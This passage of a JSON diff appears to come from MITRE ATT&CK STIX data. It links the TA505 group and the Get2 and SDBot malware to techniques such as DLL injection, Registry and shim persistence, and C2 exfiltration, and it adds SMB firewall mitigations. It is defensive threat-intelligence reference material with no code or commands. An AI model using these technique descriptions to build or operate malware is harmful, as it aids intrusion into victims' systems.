+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--02c88228-8275-42a7-9c3a-d5393556bceb",
+ "type": "relationship",
+ "modified": "2020-06-16T16:57:13.566Z",
+ "created": "2020-05-29T20:09:48.869Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a0db1e3-cd18-4f00-936b-4b8ede1e0498",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.039Z",
+ "created": "2020-05-29T20:32:42.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c14e629a-c0cd-4600-873b-924d04d8b627",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.032Z",
+ "created": "2020-05-29T20:32:42.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6118a138-c13c-4117-97dd-c3e7ec3e1021",
+ "type": "relationship",
+ "modified": "2020-05-29T20:32:42.907Z",
+ "created": "2020-05-29T20:32:42.907Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9c4281ea-b225-44b4-b460-255e51586598",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.034Z",
+ "created": "2020-05-29T20:32:42.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--db9384b2-ea34-4dd9-8554-e01b1606e7ce",
+ "type": "relationship",
+ "modified": "2020-05-29T20:32:42.954Z",
+ "created": "2020-05-29T20:32:42.954Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d56e3076-7221-4e3b-8628-d8c50982892d",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.036Z",
+ "created": "2020-05-29T20:32:42.951Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91e86813-270d-4ee6-8dff-9b87e3d9fae4",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.514Z",
+ "created": "2020-06-01T13:14:42.514Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7333e2da-7aa5-4559-a03d-5818883d62d5",
+ "type": "relationship",
+ "modified": "2020-06-01T16:11:40.359Z",
+ "created": "2020-06-01T13:14:42.529Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f252d0e6-019a-4711-9069-c16930236aa4",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.536Z",
+ "created": "2020-06-01T13:14:42.536Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e29cbcc-3e45-4e62-a66f-4479b310ccdb",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.559Z",
+ "created": "2020-06-01T13:14:42.559Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "Microsoft Preventing SMB",
+ "url": "https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections",
+ "description": "Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020."
+ }
+ ],
+ "description": "Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)",
+ "relationship_type": "mitigates",
+ "id": "relationship--bf3b7eae-a651-4a2b-9308-52fe2542766e",
+ "type": "relationship",
+ "modified": "2020-06-09T20:56:10.116Z",
+ "created": "2020-06-01T13:16:32.923Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "Microsoft Preventing SMB",
+ "url": "https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections",
+ "description": "Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020."
+ }
+ ],
+ "description": "Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)",
+ "relationship_type": "mitigates",
+ "id": "relationship--6485bfc6-53b5-43c1-9c52-6a35c3fc630d",
+ "type": "relationship",
+ "modified": "2020-06-09T20:56:10.144Z",
+ "created": "2020-06-01T13:16:32.965Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--08f4dfcb-c394-470d-851f-045bbc38cdb5",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.666Z",
+ "created": "2020-06-01T14:41:54.666Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f96a2b4a-4d74-4251-b714-40b224d3ad09",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.672Z",
+ "created": "2020-06-01T14:41:54.672Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--27ccf817-33de-4d85-85e5-851f82e835e4",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.124Z",
+ "created": "2020-06-01T14:41:54.720Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9ee385ef-7e78-47bf-be25-8ba112f9280e",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.140Z",
+ "created": "2020-06-01T14:41:54.724Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03b12a66-789a-4480-8903-deab828d08b6",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.758Z",
+ "created": "2020-06-01T14:41:54.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9c15fad4-3614-4bf0-90db-84749f34f91c",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.762Z",
+ "created": "2020-06-01T14:41:54.762Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7ef04aca-4890-4035-8c0b-69d9a78e8029",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.770Z",
+ "created": "2020-06-01T14:41:54.770Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, country code, and computer name.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--855bcd64-ef37-4197-8d3e-2c147d42d774",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.778Z",
+ "created": "2020-06-01T14:41:54.778Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1a9510e3-0bb0-4469-bbf8-2d02a3a00d66",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.244Z",
+ "created": "2020-06-01T14:41:54.865Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--102849c0-0ed7-4e85-9d0b-791bcb7ef7ab",
+ "type": "relationship",
+ "modified": "2020-06-01T16:11:40.376Z",
+ "created": "2020-06-01T14:41:54.872Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--efe5521e-a774-4a0f-a360-3cee8303833d",
+ "type": "relationship",
+ "modified": "2020-06-17T19:40:20.660Z",
+ "created": "2020-06-01T14:41:54.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a7cdf456-9ad0-402b-a914-5f1ebcd873a3",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.876Z",
+ "created": "2020-06-01T14:41:54.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--88d48848-1f23-4d91-8934-045d04b219ea",
+ "type": "relationship",
+ "modified": "2020-06-01T15:10:44.704Z",
+ "created": "2020-06-01T14:41:54.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
